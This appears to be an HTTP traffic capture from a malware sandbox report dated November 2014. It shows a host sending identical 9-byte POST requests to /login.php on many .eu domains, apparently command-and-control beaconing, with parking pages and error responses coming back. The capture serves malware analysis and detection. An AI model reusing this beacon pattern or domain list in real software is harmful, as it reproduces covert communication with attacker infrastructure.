Date: Mon, 10 Nov 2014 20:01:30 GMT
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Apache/2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">.<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">.<meta http-equiv="Content-Language" content="pl">..<style type="text/css">.. body {font-family: arial; background: #ffffff; font-size: 8px color: white;}.. td { font-family: verdana; font-size: 11px;color: black; }.. p { font-family: verdana; font-size: 18px; color: black; text-align: center;}... a:hover {text-decoration: none; color: white}.</style>.<TITLE>.(none).</TITLE>.</HEAD>.<BODY style="bgcolor: #FFFFFF">......<div style="text-align:center;">.<br>.<table width="100%" border="0" cellpadding="0" cellspacing="0" style="align: center">.<tr><td style="width: 100%" align="center">..<table width="574" style="background-image:url(/errordocs/pasek.gif); height: 21px;" border="0" cellpadding="0" cellspacing="0" >...<tr>....<td style="text-align: left">....<div style="margin-left:45px"><b>Error</b></div>....</td>...</tr>...</table>..<table width="574" border="0" cellpadding="1" cellspacing="1" style="background-color: #9c9c9c;text-align:center;">...<tr>....<td style="background-color: #ffffff">.....<br>.....<table style="background-color: #ffffff">......<tr>.......<td align="center" valign="top"><IMG SRC="/errordocs/error.gif" ALT="eroor"></td>.......<td colspan="2" al
<<< skipped >>>
GET /en/ HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: corporate.evonik.com
Pragma: no-cache
HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: hXXp://corporate.evonik.com/en/Pages/default.aspx
MicrosoftSharePointTeamServices: 12.0.0.6520
Date: Mon, 10 Nov 2014 20:01:24 GMT
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pumot.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:13 GMT
Server: Apache
Content-Length: 1363
X-Frame-Options: deny
Connection: close
Content-Type: text/html
<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <style type="text/css">. html, body, #partner, iframe {. height:100%;. width:100%;. margin:0;. padding:0;. border:0;. outline:0;. font-size:100%;. vertical-align:baseline;. background:transparent;. }. body {. overflow:hidden;. }. </style>. <meta content="NOW" name="expires">. <meta content="index, follow, all" name="GOOGLEBOT">. <meta content="index, follow, all" name="robots">. <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->. <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">. </head>. <body>. <div id="partner"></div>. <script type="text/javascript">. document.write(. '<script type="text/javascript" language="JavaScript"'. 'src="//sedoparking.com/frmpark/'. window.location.host '/'. '1und1parking6'. '/park.js">'. '<\/script>'. );. </script>. </body>.</html>..
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gater.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 301 Moved Permanently
Date: Mon, 10 Nov 2014 20:01:32 GMT
Server: Apache
Location: hXXp://VVV.gater.eu/login.php
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.gater.eu/login.php">here</a>.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocab.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:01:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.26-1~dotdeb.1
Set-Cookie: PHPSESSID=envpqbkkkiv4cm5eun0u8hgar1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocab.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocab.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocab.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocab.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocab.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocab.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: volym.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 500 Internal Server Error
Server: nginx/1.0.14
Date: Mon, 10 Nov 2014 20:01:13 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Content-Length: 640
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator,. drift@loopia.se and inform them of the time the error occurred,.and anything you might have done that may have.caused the error.</p>.<p>More information about this error may be available.in the server error log.</p>.<hr>.<address>Apache/2.2.22 (FreeBSD) PHP/5.3.10 with Suhosin-Patch Server at volym.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galen.eu
Content-Length: 9
Pragma: no-cache
Cookie: PHPSESSID=m3a1jsr8297hhd5f2r8nvd0so2
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:01:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.26-1~dotdeb.1
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>galen.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>two thousand, four hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">galen.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://galen.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="http://galen.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mas
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galev.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:34 GMT
Content-Type: text/html
Content-Length: 767
Connection: close
Server: Apache/2
Last-Modified: Fri, 20 Jun 2014 19:46:10 GMT
Accept-Ranges: bytes
<!DOCTYPE HTML>.<html>.. <head>. <title>404 Error - Page Not Found</title>.. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>. <script type="text/javascript" language="JavaScript">. var url = 'hXXp://notfound01.domainparkingserver.net/?domain_name='. document.domain '&a_id=127828';.. $(document).ready(function() {. $('#content').attr('src', url);. });. </script>. </head>. <body>. <iframe src="hXXp://notfound01.domainparkingserver.net/" id="content". frameborder="0" height="800" scrolling="auto" width="100%">.. <!-- browser does not support iframe's -->.. </iframe>. </body>..</html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pumot.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:12 GMT
Server: Apache
Content-Length: 1363
X-Frame-Options: deny
Connection: close
Content-Type: text/html
<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <style type="text/css">. html, body, #partner, iframe {. height:100%;. width:100%;. margin:0;. padding:0;. border:0;. outline:0;. font-size:100%;. vertical-align:baseline;. background:transparent;. }. body {. overflow:hidden;. }. </style>. <meta content="NOW" name="expires">. <meta content="index, follow, all" name="GOOGLEBOT">. <meta content="index, follow, all" name="robots">. <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->. <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">. </head>. <body>. <div id="partner"></div>. <script type="text/javascript">. document.write(. '<script type="text/javascript" language="JavaScript"'. 'src="//sedoparking.com/frmpark/'. window.location.host '/'. '1und1parking6'. '/park.js">'. '<\/script>'. );. </script>. </body>.</html>..
<<< skipped >>>
GET /en/Pages/default.aspx HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: corporate.evonik.com
Pragma: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23925
Content-Type: text/html; charset=utf-8
Expires: Mon, 10 Nov 2014 20:19:50 GMT
MicrosoftSharePointTeamServices: 12.0.0.6520
Date: Mon, 10 Nov 2014 20:01:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<!-- 52 --> ..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" dir="ltr">..<head>..<!-- Use IE7 mode -->..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Expires" content="0" /><title>Evonik Industries - Specialty Chemicals</title>..<link id="ctl00_MainStylesheetPath" rel="stylesheet" type="text/css" href="/_layouts/styles/evonik/internet/styles-centered.css?rev=YvHpTeHMNpqwo7mx8XNqzA==" media="screen,projection" /> ..<!--[if IE]>..<link id="ctl00_IEStylesheetPath" rel="stylesheet" type="text/css" href="/_layouts/styles/evonik/internet/styles-ie.css?rev=7fPusyX4Cm7TTZU3eQ3xSw==" media="screen,projection" /> ..<![endif]-->..<link id="ctl00_PrintStylesheetRelativePath" rel="stylesheet" type="text/css" href="/_layouts/styles/evonik/internet/print.css?rev=Og8NEt5769aVOx3S3YGJ7A==" media="print" />..<script language="javascript" type="text/javascript">../* set variables */..RESOURCES_PATH = "./_layouts/";..CURRENT_SITE_TYPE = "market_site";..</script>..<script language="javascript" id="ctl00_jquery" type="text/javascript" src="/_layouts/websites/viscript/jquery.js?rev=uxIrM9ZNAqEGvyIwstQa8A==">..</script><script language="javascript" id="ctl00_RelativeScriptLink1" type="text/
<<< skipped >>>
GET /login.php HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: VVV.dr.dk
Pragma: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Template: legacy
X-Cacheable: YES:default_ttl=119.000
Cache-Control:
Date: Mon, 10 Nov 2014 20:01:21 GMT
X-Varnish: 2322934300 2322933706
Age: 0
Via: 1.1 varnish
Connection: close
X-Via: varnishol04.dr.dk (172.18.120.164:80)
X-Cache: HIT
X-WebEdge: 2519
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>....
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykil.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.0.14
Date: Mon, 10 Nov 2014 20:01:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: X-Forwarded-For
X-Powered-By: PHP/5.3.10
X-Pingback: hXXp://lykil.se/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 7146
Accept-Ranges: bytes
X-Varnish: 2462812295
Age: 0
Via: 1.1 varnish
X-Loopia-Cache: MISS
<!DOCTYPE html>.<html lang="sv-SE" prefix="og: hXXp://ogp.me/ns# fb: hXXp://ogp.me/ns/fb#">.<head>.<meta charset="UTF-8" />.<title>404 Not Found | lykil</title>.<link rel="profile" href="hXXp://gmpg.org/xfn/11" />.<link rel="stylesheet" type="text/css" media="all" href="hXXp://lykil.se/wp-content/themes/page7/style.css" />.<link rel="pingback" href="hXXp://lykil.se/xmlrpc.php" />..<!-- SEO Ultimate (hXXp://VVV.seodesignsolutions.com/wordpress-seo/) -->.<!-- /SEO Ultimate -->..<link rel='stylesheet' id='frm-forms-css' href='hXXp://lykil.se/wp-content/plugins/formidable/css/frm_display.css?ver=1.07.04' type='text/css' media='all' />.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>.<link rel="EditURI" type="application/rsd xml" title="RSD" href="hXXp://lykil.se/xmlrpc.php?rsd" />.<link rel="wlwmanifest" type="application/wlwmanifest xml" href="hXXp://lykil.se/wp-includes/wlwmanifest.xml" /> .<meta name="generator" content="WordPress 4.0" />.<script src="http://lykil.se/wp-content/themes/page7/js/superfish-combined.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/jquery.cycle.all.min.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/script.js"></script>.&l
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: purol.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 500 Internal Server Error
Date: Mon, 10 Nov 2014 20:01:12 GMT
Server: Apache
Content-Length: 2072
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>.<head>..<title>Error 500 - Internal server error</title>.</head>..<body bgcolor="White" text="Black">...<table cellspacing="0" cellpadding="0" width="100%" height="100%" border="0">.<tr>..<td align="center" valign="middle">......<table border="0" cellspacing="0" cellpadding="0">...<tr>....<td rowspan="5" valign="top"><img src="/spicons/server.jpg" width=163 height=177 alt="" border="0"></td>....<td colspan="4"><img src="/spicons/mrblue.gif" width="500" height=2 alt="" border="0"></td>....<td><img src="/spicons/undercover.gif" width=1 height=2 alt="" border="0"></td>...</tr><tr>....<td rowspan="4" valign="bottom"><img src="/spicons/ecke.gif" width=14 height=43 alt="" border="0"></td>......<td valign="middle" align="center" rowspan="2">.....<table cellspacing="1" cellpadding="0" width=470 border="0">.....<tr>......<td><font face="Verdana, Helvetica, sans-serif" size="5" color="Red"><b>Error 500 - Internal server error</b></font><br><img src="/spicons/undercover.gif" width=14 height=5 alt="" border="0"><br></td>.....</tr><tr>......<td><font face="Verdana, Helvetica, sans-serif" size="2" color="Black">The server encountered an unexpected condition which prevented it from fulfilling the request.&
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysen.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 301 Moved Permanently
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache
X-UD-Host: webspace.udag.de
X-UD-Method: header
Location: hXXp://VVV.dr.dk/login.php
Connection: close
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyran.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 207
Accept-Ranges: bytes
Date: Mon, 10 Nov 2014 20:01:34 GMT
X-Varnish: 1001492731
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatun.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.2.4
Date: Mon, 10 Nov 2014 20:01:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.13
Set-Cookie: 22afb07fb7b37e411b809b5a50bb58a4=e3d67bf7a2853f95840a6b5a8f632b61; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Status: 404 Article not found
Cache-Control: no-cache
Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr">..<head>...<title>404 - Error: 404</title>...<link rel="stylesheet" href="/templates/gatun_jslab/css/style.css" type="text/css" />..</head>..<body>..<div class="box404"><img src="/templates/gatun_jslab/images/404.png" alt="" /></div>.. <!--...<div class="error">....<div id="outline">....<div id="errorboxoutline">.....<div id="errorboxheader">404 - Article not found</div>.....<div id="errorboxbody">.....<p><strong>You may not be able to visit this page because of:</strong></p>......<ol>.......<li>an <strong>out-of-date bookmark/favourite</strong></li>.......<li>a search engine that has an <strong>out-of-date listing for this site</strong></li>.......<li>a <strong>mistyped address</strong></li>.......<li>you have <strong>no access</strong> to this page</li>.......<li>The requested resource was not found.</li>.......<li>An error has occurred while processing your request.</li>......</ol>.....<p><strong>Please try one of the following pages:</strong></p>......<ul>.......<li><a href="/index.php" title="Go to the Home P
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: purel.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 207
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galik.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 03 Sep 2014 09:20:02 GMT
ETag: "1007b4-70e-50225bda086dd"
Accept-Ranges: bytes
Content-Length: 1806
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head>. <title>ERROR 404 - Not Found!</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="robots" content="noindex" />. <style type="text/css"><!--. body {. color: #444444;. background-color: #EEEEEE;. font-family: 'Trebuchet MS', sans-serif;. font-size: 80%;. }. h1 {}. h2 { font-size: 1.2em; }. #page{. background-color: #FFFFFF;. width: 60%;. margin: 24px auto;. padding: 12px;. }. #header {. padding: 6px ;. text-align: center;. }. .status3xx { background-color: #475076; color: #FFFFFF; }. .status4xx { background-color: #C55042; color: #FFFFFF; }. .status5xx { background-color: #F2E81A; color: #000000; }. #content {. padding: 4px 0 24px 0;. }. #footer {. color: #666666;. background: #f9f9f9;. padding: 10px 20px;. border-top: 5px #efefef solid;. font-size: 0.8em;. text-align: center;. }. #footer a {. color: #999999;. }. --></style>.</head>.<body>. <div id="page">. <div id="header" class="status4xx">. <h1>ERROR 404 - Not Found!</h1>. </div>. <div id="content"
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galin.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 301 Moved Permanently
Location: hXXp://VVV.galin.eu/login.php
Content-Length: 0
Connection: close
Date: Mon, 10 Nov 2014 20:01:00 GMT
Server: lighttpd
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymos.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 10 Nov 2014 20:01:31 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galev.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:34 GMT
Content-Type: text/html
Content-Length: 767
Connection: close
Server: Apache/2
Last-Modified: Fri, 20 Jun 2014 19:46:10 GMT
Accept-Ranges: bytes
<!DOCTYPE HTML>.<html>.. <head>. <title>404 Error - Page Not Found</title>.. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>. <script type="text/javascript" language="JavaScript">. var url = 'hXXp://notfound01.domainparkingserver.net/?domain_name='. document.domain '&a_id=127828';.. $(document).ready(function() {. $('#content').attr('src', url);. });. </script>. </head>. <body>. <iframe src="hXXp://notfound01.domainparkingserver.net/" id="content". frameborder="0" height="800" scrolling="auto" width="100%">.. <!-- browser does not support iframe's -->.. </iframe>. </body>..</html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykil.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.0.14
